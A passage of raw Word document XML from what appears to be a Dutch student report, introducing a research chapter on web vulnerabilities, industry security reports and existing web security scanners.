YMomQZjc8gYHsapmC2CHkSZ6BrCv5f0L9AwAA//8D&#10;AFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF5X4QSgAgAA1AUAAA4AAAAAAAAAAAAAAAAALAIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAmGHPTfAAAACgEAAA8AAAAAAAAAAAAAAAAA+AQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAEBgAAAAA=&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251846656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E857E24" wp14:editId="7244FEEC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>319405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3905250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4693285" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="501" name="Text Box 501"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4693285" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6920F9C7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00DD0F33" w:rsidRDefault="00CE4BB5" w:rsidP="00940968">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="32"/>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57E24" id="Text Box 501" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:25.15pt;margin-top:307.5pt;width:369.55pt;height:21.2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fRfTkCAAB5BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0E2GA0IlSMimlS1VaC&#10;qc/GcYgl2+fZhoT9+p2dhHbdnqa9mPPd5Tvf992xvG21ImfhvART0MloTIkwHEppjgX9vt9+WFDi&#10;AzMlU2BEQS/C09vV+3fLxuZiCjWoUjiCIMbnjS1oHYLNs8zzWmjmR2CFwWAFTrOAV3fMSscaRNcq&#10;m47H86wBV1oHXHiP3rsuSFcJv6oED49V5UUgqqD4tpBOl85DPLPVkuVHx2wtef8M9g+v0EwaLHqF&#10;umOBkZOTf0BpyR14qMKIg86gqiQXqQfsZjJ+082uZlakXpAcb680+f8Hyx/OT47IsqCz8YQSwzSK&#10;tBdtIF+gJdGHDDXW55i4s5gaWgyg0oPfozM23lZOx19siWAcub5c+Y1wHJ2f5jcfp4sZJRxj0/nN&#10;4vMswmQvX1vnw1cBmkSjoA71S7Sy870PXeqQEot5ULLcSqXiJQY2ypEzQ62bWgbRg/+WpUzMNRC/&#10;6gA7j0jD0leJDXeNRSu0hzZRNB+aPkB5QS4cdPPkLd9KrH7PfHhiDgcI28elCI94VAqagkJvUVKD&#10;+/k3f8xHXTFKSYMDWVD/48ScoER9M6h4nN7BcINxGAxz0hvAvlFDfE0y8QMX1GBWDvQz7so6VsEQ&#10;MxxrFTQM5iZ0a4G7xsV6nZJwRi0L92ZneYQeWN63z8zZXqOA6j7AMKosfyNVl5vEsutTQN6TjpHX&#10;jkXUP15wvtMk9LsYF+j1PWW9/GOsfgEAAP//AwBQSwMEFAAGAAgAAAAhADPYya7iAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj7FOwzAQhnck3sE6JBZEndIkLSFOVVUw0KUidGFzYzcOxOfIdtrw&#10;9hwTjHf36b/vL9eT7dlZ+9A5FDCfJcA0Nk512Ao4vL/cr4CFKFHJ3qEW8K0DrKvrq1IWyl3wTZ/r&#10;2DIKwVBIASbGoeA8NEZbGWZu0Ei3k/NWRhp9y5WXFwq3PX9Ikpxb2SF9MHLQW6Obr3q0Avbpx97c&#10;jafn3SZd+NfDuM0/21qI25tp8wQs6in+wfCrT+pQkdPRjagC6wVkyYJIAfk8o04ELFePKbAjbbJl&#10;Brwq+f8K1Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAu2fRfTkCAAB5BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAM9jJruIAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6920F9C7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00DD0F33" w:rsidRDefault="00CE4BB5" w:rsidP="00940968">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 2.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251845632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BF48763" wp14:editId="4EFAD148">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>319405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>343535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4693285" cy="3504565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTopAndBottom/>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693285" cy="3504565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B6E35" w14:textId="36550638" w:rsidR="00EE21D9" w:rsidRPr="00EE21D9" w:rsidRDefault="00EE21D9" w:rsidP="00EE21D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E15E8DE" w14:textId="77777777" w:rsidR="00017EF0" w:rsidRDefault="00A4332F" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE21D9">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc491022057"/>
      <w:r w:rsidR="00740679">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00017EF0" w:rsidRPr="00017EF0">
        <w:t>Onderzoek</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="55F47251" w14:textId="3B12B91C" w:rsidR="00570A2C" w:rsidRPr="00017EF0" w:rsidRDefault="00570A2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5854376B" wp14:editId="5FBA1500">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-46355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>107950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3535680" cy="678180"/>
                <wp:effectExtent l="0" t="0" r="26670" b="26670"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="14" name="Text Box 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3535680"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33B9A3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A">
                            <w:r>
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="74304149" w14:textId="40E375C3" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A">
                            <w:r>
                              <w:t>Wat is een webapplicatie s</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A3319">
                              <w:t>canner?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="389E0294" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A"/>
                          <w:p w14:paraId="2FF20C95" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5"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4376B" id="Text Box 14" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-3.65pt;margin-top:8.5pt;width:278.4pt;height:5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5/OYUCAACKBQAADgAAAGRycy9lMm9Eb2MueG1srFRbT9swFH6ftP9g+X2khXJZRYo6ENMkBGgw&#10;8ew6No3m+Hi226b79fvsJKVivDDtJTk+5zv3y/lF2xi2Vj7UZEs+PhhxpqykqrbPJf/xeP3pjLMQ&#10;ha2EIatKvlWBX8w+fjjfuKk6pCWZSnkGIzZMN67kyxjdtCiCXKpGhANyykKoyTci4umfi8qLDaw3&#10;pjgcjU6KDfnKeZIqBHCvOiGfZftaKxnvtA4qMlNyxBbz1+fvIn2L2bmYPnvhlrXswxD/EEUjagun&#10;O1NXIgq28vVfpppaegqk44GkpiCta6lyDshmPHqVzcNSOJVzQXGC25Up/D+z8nZ971ldoXcTzqxo&#10;0KNH1Ub2hVoGFuqzcWEK2IMDMLbgAzvwA5gp7Vb7Jv2REIMcld7uqpusSTCPjo+OT84gkpCdnJ6N&#10;QcN88aLtfIhfFTUsESX36F4uqljfhNhBB0hyZum6NiZ30NjECGTqKvHyI42QujSerQWaH9scNLzt&#10;ofDqNFUeld5LSrhLLFNxa1QyaOx3pVGqnN8bHoSUysbBS0YnlEY871Hs8Um1i+o9yjuN7Jls3Ck3&#10;tSWfq5l366Uw1c8hZN3h0ZK9vBMZ20WbZ+R06PuCqi3GwVO3UMHJ6xo9uxEh3guPDUKbcRXiHT7a&#10;0Kbk1FOcLcn/fouf8BhsSDnbYCNLHn6thFecmW8WI/95PJmkFc6PyfHpIR5+X7LYl9hVc0no+xj3&#10;x8lMJnw0A6k9NU84HvPkFSJhJXxjUAbyMnZ3AsdHqvk8g7C0TsQb++BkMp2qnCbysX0S3vVjGzHw&#10;tzTsrpi+mt4OmzQtzVeRdJ1HO9W5q2pffyx8Xo7+OKWLsv/OqJcTOvsDAAD//wMAUEsDBBQABgAI&#10;AAAAIQDJZstG4QAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BbsIwEETvlfgHa5F6AwcohKZx&#10;UAtCqhA9ABXq0cTbJCJeR7GB8Pfdntrjzoxm36SLztbiiq2vHCkYDSMQSLkzFRUKPg/rwRyED5qM&#10;rh2hgjt6WGS9h1Qnxt1oh9d9KASXkE+0gjKEJpHS5yVa7YeuQWLv27VWBz7bQppW37jc1nIcRTNp&#10;dUX8odQNLkvMz/uLVfB+uG928fJjZjdvq6/tUfrjerVV6rHfvb6ACNiFvzD84jM6ZMx0chcyXtQK&#10;BvGEk6zHPIn96dPzFMSJhfFkDjJL5f8F2Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;I7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;/p5/OYUCAACKBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAyWbLRuEAAAAJAQAADwAAAAAAAAAAAAAAAADdBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7733B9A3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A">
                      <w:r>
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="74304149" w14:textId="40E375C3" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A">
                      <w:r>
                        <w:t>Wat is een webapplicatie s</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A3319">
                        <w:t>canner?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="389E0294" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00B4444A"/>
                    <w:p w14:paraId="2FF20C95" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102DD39" w14:textId="77777777" w:rsidR="00570A2C" w:rsidRDefault="00570A2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F8B394" w14:textId="33DE381C" w:rsidR="0083191B" w:rsidRDefault="0083191B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A400921" w14:textId="37EED0AB" w:rsidR="00382817" w:rsidRPr="00382817" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc491022058"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00382817" w:rsidRPr="00382817">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="513F9F74" w14:textId="0878F4EC" w:rsidR="00753C7F" w:rsidRDefault="007C4FC2" w:rsidP="004E1E32">
      <w:r>
        <w:t>Dit hoofdstuk zal gaan over mijn onder</w:t>
      </w:r>
      <w:r w:rsidR="000074EF">
        <w:t>zoek die de bas</w:t>
      </w:r>
      <w:r w:rsidR="009E02EE">
        <w:t>is leg</w:t>
      </w:r>
      <w:r w:rsidR="00A51BBB">
        <w:t xml:space="preserve">t voor de Web Security Scanner. </w:t>
      </w:r>
      <w:r w:rsidR="0054715A">
        <w:t>In dit hoofdstuk heb</w:t>
      </w:r>
      <w:r w:rsidR="004879D1">
        <w:t xml:space="preserve"> ik verschillende onderwerpen rondom web security onderzocht.</w:t>
      </w:r>
      <w:r w:rsidR="00831CED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5AED">
        <w:t>Het onderzoek is</w:t>
      </w:r>
      <w:r w:rsidR="00361D30">
        <w:t xml:space="preserve"> grotendeels gedaan vanaf het bureau</w:t>
      </w:r>
      <w:r w:rsidR="00BD49F4">
        <w:t xml:space="preserve">, wat ook wel betekent staat als bureauonderzoek of </w:t>
      </w:r>
      <w:r w:rsidR="00ED5C7E">
        <w:t>desk</w:t>
      </w:r>
      <w:r w:rsidR="00BD49F4">
        <w:t xml:space="preserve">onderzoek. Deze soort onderzoek </w:t>
      </w:r>
      <w:r w:rsidR="00361D30">
        <w:t xml:space="preserve">kan </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>verdeeld</w:t>
      </w:r>
      <w:r w:rsidR="00361D30">
        <w:t xml:space="preserve"> worden</w:t>
      </w:r>
      <w:r w:rsidR="00BD5AED">
        <w:t xml:space="preserve"> in twee categorie</w:t>
      </w:r>
      <w:r w:rsidR="00361D30">
        <w:t>ën:</w:t>
      </w:r>
      <w:r w:rsidR="00FD5578">
        <w:t xml:space="preserve"> primaire data en s</w:t>
      </w:r>
      <w:r w:rsidR="00ED5C7E">
        <w:t>ecundaire data.</w:t>
      </w:r>
      <w:r w:rsidR="00067A76">
        <w:t xml:space="preserve"> De categorie primaire data heeft in de context van mijn onderzoek betrekking op software testing.</w:t>
      </w:r>
      <w:r w:rsidR="006362C5">
        <w:t xml:space="preserve"> Het is primaire omdat ik zelf de software tests en hierdoor zelf de informatie produceer.</w:t>
      </w:r>
      <w:r w:rsidR="003474F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD49F4">
        <w:t xml:space="preserve">Bij een </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>secundair</w:t>
      </w:r>
      <w:r w:rsidR="00BD49F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00037FF0">
        <w:t>bureau</w:t>
      </w:r>
      <w:r w:rsidR="00BD49F4">
        <w:t>onderzoek</w:t>
      </w:r>
      <w:r w:rsidR="00037FF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE6287">
        <w:t xml:space="preserve">heb ik gebruik gemaakt van bestaande informatie dat door andere is geproduceerd. Voorbeelden hiervan zijn online artikelen, literatuur, informatieve video’s. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40290ABC" w14:textId="77777777" w:rsidR="00382817" w:rsidRDefault="00382817" w:rsidP="004E1E32">
      <w:r>
        <w:t>De onderwerpen die ik in dit hoofdstuk zal behandelen zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58403D37" w14:textId="61E26542" w:rsidR="00382817" w:rsidRDefault="00382817" w:rsidP="004E1E32">
      <w:r>
        <w:t>Web security en de kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45537569" w14:textId="490BE3D4" w:rsidR="00786D0A" w:rsidRDefault="00E820ED" w:rsidP="008E5C1F">
      <w:r>
        <w:t xml:space="preserve">Een onderzoek naar de kwetsbaarheden van websites. Hierin zal ik </w:t>
      </w:r>
      <w:r w:rsidR="005222A2">
        <w:t xml:space="preserve">kijken naar de kwetsbaarheden die kunnen voorkomen op een website. </w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t>Het aanbod van technologieën voor het ontwikkelen van website wordt met het jaar groter en dat geeft de web ontwikkelaars de mogelijkheid om websites op verschillende</w:t>
      </w:r>
      <w:r w:rsidR="000A2F36">
        <w:t xml:space="preserve"> manieren te bouwen. </w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t>Maar innovaties</w:t>
      </w:r>
      <w:r w:rsidR="000D7D5F">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008546AB">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00171268">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>ontwikkeling</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00610B93">
        <w:t xml:space="preserve"> brengen ook </w:t>
      </w:r>
      <w:r w:rsidR="000E14BF">
        <w:t xml:space="preserve">securitylekken </w:t>
      </w:r>
      <w:r w:rsidR="00CD167D">
        <w:t xml:space="preserve">met zich </w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t>mee</w:t>
      </w:r>
      <w:r w:rsidR="006D6350">
        <w:t xml:space="preserve"> waar cybercriminelen misbruik van</w:t>
      </w:r>
      <w:r w:rsidR="00AF438B">
        <w:t xml:space="preserve"> kunnen</w:t>
      </w:r>
      <w:r w:rsidR="006D6350">
        <w:t xml:space="preserve"> maken. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B721DD" w14:textId="29734FA2" w:rsidR="00B71932" w:rsidRDefault="00101757" w:rsidP="004E1E32">
      <w:r>
        <w:t xml:space="preserve">Hoe groot is het </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D91EC7">
        <w:t>security probleem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B71932">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C03836" w14:textId="61E1FD8F" w:rsidR="00FC7E08" w:rsidRDefault="000919AA" w:rsidP="004E1E32">
      <w:r>
        <w:t>Wat rapporteren de grote bedrijven over het probleem web security</w:t>
      </w:r>
      <w:r w:rsidR="00FB1B77">
        <w:t>. In dit deel heb ik de analyse en rapportage van drie grote security bedrijven</w:t>
      </w:r>
      <w:r w:rsidR="007B0B90">
        <w:t xml:space="preserve"> onder de loep genomen om te kijken wat hun onderzoek naar web security over de r</w:t>
      </w:r>
      <w:r w:rsidR="002D08D6">
        <w:t xml:space="preserve">ecente jaren hebben opgeleverd. </w:t>
      </w:r>
      <w:r w:rsidR="000832B9">
        <w:t xml:space="preserve">Web security blijft ieder jaar een </w:t>
      </w:r>
      <w:r w:rsidR="003A326C">
        <w:t>interessant</w:t>
      </w:r>
      <w:r w:rsidR="000832B9">
        <w:t xml:space="preserve"> onderwerp van onderzoek vanwege de nieuwe ontwikkelingen op </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>softwaregebied</w:t>
      </w:r>
      <w:r w:rsidR="000832B9">
        <w:t xml:space="preserve"> die </w:t>
      </w:r>
      <w:r w:rsidR="001B2B1E">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="000832B9">
        <w:t>bedreigingen met zich mee brengen.</w:t>
      </w:r>
      <w:r w:rsidR="005B761D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A72993">
        <w:t xml:space="preserve">Daarom brengen iedere jaar bedrijven als IBM, Symantec en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A72993">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A72993">
        <w:t xml:space="preserve"> rapporten uit om de geïnteresseerde te informeren over de stand van zaken op </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008546AB">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="0091247F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>gebied</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A72993">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F4562C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000832B9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FFEDD" w14:textId="059BC66E" w:rsidR="00B71932" w:rsidRDefault="00B71932" w:rsidP="004E1E32">
      <w:r>
        <w:t>Wat zijn de kenmerken van bestaande web scan applicaties?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44181C76" w14:textId="1600C1A9" w:rsidR="00A72993" w:rsidRDefault="0017772F" w:rsidP="004E1E32">
      <w:r>
        <w:t xml:space="preserve">Met de opkomst van webapplicaties </w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>kunnen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruiker een </w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>interactieve ervaring beleven</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> op het internet</w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>. Dit maakt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mogelijkheid </w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>dat gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="003D0EF1">
        <w:t>s taken kunnen uitvoeren</w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t xml:space="preserve"> zoals:</w:t>
      </w:r>
      <w:r w:rsidR="00B773EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>persoonlijke accounts te maken, informatie op te vragen vanuit een database en digitale transacties te maken</w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE3042">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A0CF6">
        <w:t>Al deze nieuwe functionaliteiten brengen ook nieuwe gevaren met zich mee</w:t>
      </w:r>
      <w:r w:rsidR="00196F3F">
        <w:t xml:space="preserve">, hackers die kwetsbaarheden in deze functionaliteiten vinden hebben de mogelijkheid om het te exploiteren. </w:t>
      </w:r>
      <w:r w:rsidR="0082357B">
        <w:t xml:space="preserve">Dit is hoofdzakelijk waarom er organisaties zijn die zich bezighouden met het ontwikkelen van tools waarmee </w:t>
      </w:r>
      <w:r w:rsidR="006965B3">
        <w:t>webapplicaties</w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve"> getest kunnen worden op kwetsbaarheden zodat deze in een </w:t>
      </w:r>
      <w:r w:rsidR="006965B3">
        <w:t>vroeg</w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve"> stadium gedetecteerd kunnen worden. </w:t>
      </w:r>
      <w:r w:rsidR="004D50B5">
        <w:t xml:space="preserve">De security scanner is een relatief nieuwe begrip, wat pas halverwege de eerste decennia </w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve">zich </w:t>
      </w:r>
      <w:r w:rsidR="004D50B5">
        <w:t>heeft gevestigd als een volwaardige kandidaat op de software</w:t>
      </w:r>
      <w:r>
        <w:t>markt.</w:t>
      </w:r>
      <w:r w:rsidR="007A7291">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t>Er zijn talloze web security scanners ontwikkelt over de jaren heen. Ik zal in dit deel twee van deze soort scanners onder de loep nemen en testen.</w:t>
      </w:r>
    </w:p>
